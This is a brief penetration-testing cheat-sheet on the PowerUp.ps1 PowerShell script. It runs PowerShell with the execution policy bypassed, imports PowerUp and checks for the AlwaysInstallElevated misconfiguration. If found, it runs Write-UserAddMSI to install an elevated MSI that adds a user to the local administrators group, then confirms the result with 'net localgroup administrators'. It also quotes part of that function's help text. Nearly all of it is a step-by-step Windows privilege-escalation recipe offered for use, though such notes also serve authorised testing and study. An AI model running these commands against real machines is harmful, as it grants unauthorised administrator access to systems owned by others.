PS – Powerup

Powerup –

powershell.exe -exec bypass

Import-Module .\PowerUp.ps1


If you see AbuseFunction : Write-UserAddMSI under Checking for AlwaysInstallElevated registry key

Just let Powerup finish then copy and paste Write-UserAddMSI into PS and it will install a program which runs as admin which allows you to add user / password to local admin group.

To check it has worked

net localgroup administrators


Exstract from

function Write-UserAddMSI {



Writes out a precompiled MSI installer that prompts for a user/group addition.

This function can be used to abuse Get-RegAlwaysInstallElevated.


PS C:\> Write-UserAddMSI

Writes the user add MSI to the local directory.